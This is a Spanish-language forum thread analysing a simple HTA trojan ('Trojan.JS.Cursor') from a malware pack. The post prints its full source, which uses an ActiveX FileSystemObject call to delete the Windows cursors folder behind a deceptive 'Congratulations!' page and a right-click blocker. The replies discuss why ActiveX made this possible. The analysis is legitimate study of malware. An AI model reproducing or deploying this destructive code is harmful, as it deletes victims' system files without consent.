Trojan.JS.Cursor

Iniciado por patilanz, 24 Diciembre 2014, 10:33 AM

0 Miembros y 1 Visitante están viendo este tema.

patilanz

Hola me descargue un pack con muchos troyanos virus etc.. y ahora los estoy analizando.
Código (html4strict) [Seleccionar]
[code=javascript]<HTML>
<HEAD>

<TITLE>Virus</TITLE>

<script language="JScript">

var fs = new ActiveXObject("Scripting.FileSystemObject");
var a = fs.DeleteFolder("c:\\windows/cursors");

</script>

<HTA:APPLICATION
       ID="oHTA"
       APPLICATIONNAME="ComplexHTA"
       CAPTION="yes"
       ICON="ComplexHTA.ico"
       MAXIMIZEBUTTON="no"
       MINIMIZEBUTTON="no"
       SHOWINTASKBAR="no"
       SINGLEINSTANCE="no"
       SYSMENU="no"
       VERSION="1.0"
       WINDOWSTATE="normal">

<script language="javascript">

var message="Now Hang On Here!";

function click(e) {
if (document.all) {
if (event.button == 2) {
alert(message);
return false;
}
}
if (document.layers) {
if (e.which == 3) {
alert(message);
return false;
}
}
}
if (document.layers) {
document.captureEvents(Event.MOUSEDOWN);
}
document.onmousedown=click;

</script>

</HEAD>

<BODY BGCOLOR="000000" TEXT="FFFFFF" LINK="6BC8F2" VLINK="6BC8F2" ALINK="6BC8F2">

<BR>
<BR>
<BR>

<CENTER>Congratulations!</CENTER>

<P>

<center><BUTTON onclick="self.close()">Click Here To Close

</BUTTON></center>

</HTML>
[/code]

Supongo que sera muy muy antiguo porque:

Código (javascript) [Seleccionar]
var fs = new ActiveXObject("Scripting.FileSystemObject");
var a = fs.DeleteFolder("c:\\windows/cursors");


Borra la carpeta cursors así sin mas y luego se burla de que no puede pulsar el botón para salir  ;D
Que os parece?

BlackM4ster

No creo que javascript actualmente pueda borrar una carpeta del sistema xD
- Pásate por mi web -
https://codeisc.com

engel lex

Cita de: BlackM4ster en 24 Diciembre 2014, 10:43 AM
No creo que javascript actualmente pueda borrar una carpeta del sistema xD

no es el jscript solo... es el activeX que lo hace vulnerable, permitiendo escapar del navegador
El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.